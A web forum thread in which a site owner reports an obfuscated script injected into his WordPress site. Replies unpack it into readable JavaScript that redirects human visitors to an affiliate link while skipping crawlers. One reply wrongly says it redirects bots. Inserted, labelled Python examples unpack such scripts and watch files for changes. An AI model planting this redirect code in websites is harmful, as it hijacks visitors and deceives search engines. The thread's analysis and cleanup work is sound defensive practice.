Found a script in my site

  • lezinterracial
    Confirmed User
    • Jul 2012
    • 3117

    #1

    Tech Found a script in my site

    This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

    Gonna update my WordPress sites. Change my password. Any other ideas?
    Here is the code I found. Thanks.

    Code:
    <br></br><br></br>
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 
3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDu
ckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>
    Live Sex Shows
  • just a punk
    So fuckin' bored
    • Jun 2003
    • 32393

    #2
    Originally posted by lezinterracial
    This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

    Gonna update my WordPress sites. Change my password. Any other ideas?
    Here is the code I found. Thanks.

    Here is the original code:

    Code:
    blur_started1 = null;
    switch_flag1 = false;
    window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();
    now.setTime(now.getTime()+60*60*24*7*1000);
    var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');
    if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";
    if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};
    window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)}};
    It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

    P.S. Your site has been hacked.
    Obey the Cowgod

    Comment
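Added example, not part of the thread: a way to recover readable source from a `p,a,c,k,e,d` wrapper like the one in post #1 without ever evaluating it, followed by decoding of the `\xNN` escapes that keep the redirect URL out of plain-text searches. `SAMPLE` is constructed for illustration, `example.test` is a placeholder, and the function names are this example's own.

```python
import re

# Matches the argument list of a Dean Edwards "p,a,c,k,e,d" wrapper:
#   }('<payload>', <base>, <count>, '<w0|w1|...>'.split('|')
PACKED_RE = re.compile(
    r"\}\s*\(\s*'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:\\.|[^'\\])*)'\.split\('\|'\)")
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def token(n, base):
    """Same numbering as the packer's e(c): index n written in base <= 62."""
    out = DIGITS[n % base]
    while n >= base:
        n //= base
        out = DIGITS[n % base] + out
    return out

def unpack(source):
    """Return the unpacked JavaScript as text, or None if no wrapper is found."""
    m = PACKED_RE.search(source)
    if m is None:
        return None
    base, count = int(m.group(2)), int(m.group(3))
    words = m.group(4).split("|")
    # An empty dictionary slot means the token stands for itself.
    table = {token(i, base): (words[i] if i < len(words) else "") or token(i, base)
             for i in range(count)}
    # Undo JS string escaping; this handles the backslash and quote escapes only.
    payload = re.sub(r"\\(.)", r"\1", m.group(1), flags=re.S)
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)),
                  payload, flags=re.ASCII)

def reveal_hex(js):
    """Turn \\xNN escapes into characters so hidden URLs become greppable."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda h: chr(int(h.group(1), 16)), js)

# Constructed sample in the same shape as the script in post #1 (not the real one).
SAMPLE = (r"""eval(function(p,a,c,k,e,d){/* decoder body omitted */}"""
          r"""('0.1.2("\\3\\4\\4\\5://6.7/")',62,8,"""
          r"""'window|location|replace|x68|x74|x70|example|test'.split('|'),0,{}))""")

if __name__ == "__main__":
    print(reveal_hex(unpack(SAMPLE)))
```

The packed text is only ever treated as a string, so nothing in it executes on the analyst's machine.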

    • lezinterracial
      Confirmed User
      • Jul 2012
      • 3117

      #3
      Originally posted by CyberSEO
      Here is the original code:

      It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

      P.S. Your site has been hacked.

      Yep, the go2click redirects to iwantu.com/aff.php?dynamicpage=iwu_wlp_5st_tmr_a&a_bid=dc57a3f7&utm_sub=opnfnl&utm_source=int&utm_medium=web&utm_campaign=476cb13b&utm_content=2617&data2=06pvh21bg0082


      Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know.
      Live Sex Shows

      Comment

      • just a punk
        So fuckin' bored
        • Jun 2003
        • 32393

        #4
        Originally posted by lezinterracial
        Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know.
        If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid.
        Obey the Cowgod

        Comment

        • lezinterracial
          Confirmed User
          • Jul 2012
          • 3117

          #5
          Originally posted by CyberSEO
          If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid.
          https://help.dreamhost.com/hc/en-us/...ite-was-hacked

          Noticed no world writable directories.
          find . -type d -perm -o=w

          And no logins from any other IPs over the past month. I used the command

          last -if /var/log/wtmp.1 | grep youruser | awk '{print $3}' | sort | uniq -c


          Just gotta keep looking through the logs.
          Live Sex Shows

          Comment

          • lezinterracial
            Confirmed User
            • Jul 2012
            • 3117

            #6
            Oh well. Searched all through my logs but I couldn't find when this happened. I e-mailed iwantu.org support. Hoping they could help me some with a time frame. But I notice the go2click.org link redirects to different sites.

            I scanned my computer for malware, none found. I went ahead and updated PHP 5.5 to 5.6. Weird timing, 'cause DreamHost just moved me to a new server this evening.

            Just gonna keep an eye on the files and see if they get modified again. Then I will know where to look in the logs.

            On a positive note, I have learned much today. First time I have used PuTTY to connect to my web server to get a shell. Learned some about PHP hacking.
            Live Sex Shows

            Comment
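Added example, not part of the thread: one way to do the "keep an eye on the files" step from post #6, by hashing the web-served files into a baseline and reporting what was added, changed or removed since, along with any file carrying the packer wrapper from post #1. The extension list, the script name and the baseline file are assumptions of this example.

```python
import hashlib, json, os

SIGNATURE = b"eval(function(p,a,c,k,e,d)"  # wrapper of the script in post #1
EXTS = (".php", ".js", ".html", ".htm")    # assumption: file types worth hashing

def snapshot(root):
    """Map relative path -> {"sha256": ..., "packed": bool} for files under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            snap[os.path.relpath(path, root)] = {
                "sha256": hashlib.sha256(data).hexdigest(),
                "packed": SIGNATURE in data,
            }
    return snap

def compare(old, new):
    """Return (added, changed, removed, packed) as sorted lists of paths."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    changed = sorted(p for p in new
                     if p in old and new[p]["sha256"] != old[p]["sha256"])
    packed = sorted(p for p in new if new[p]["packed"])
    return added, changed, removed, packed

if __name__ == "__main__":
    import sys, time
    if len(sys.argv) != 3:
        sys.exit("usage: python3 watch_webroot.py WEBROOT BASELINE.json")
    root, baseline = sys.argv[1:]
    current = snapshot(root)
    if os.path.exists(baseline):
        with open(baseline) as fh:
            report = compare(json.load(fh), current)
        for label, paths in zip(("added", "changed", "removed", "packed"), report):
            for p in paths:
                full = os.path.join(root, p)
                when = time.ctime(os.path.getmtime(full)) if os.path.exists(full) else "-"
                print(f"{label:8} {when}  {p}")
    else:  # first run: record the state to compare against later
        with open(baseline, "w") as fh:
            json.dump(current, fh, indent=1)
```

Legitimate minified libraries sometimes use the same packer, so a `packed` hit is a lead to review rather than a verdict; the modification time printed for a changed file is a starting window for the access-log search.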
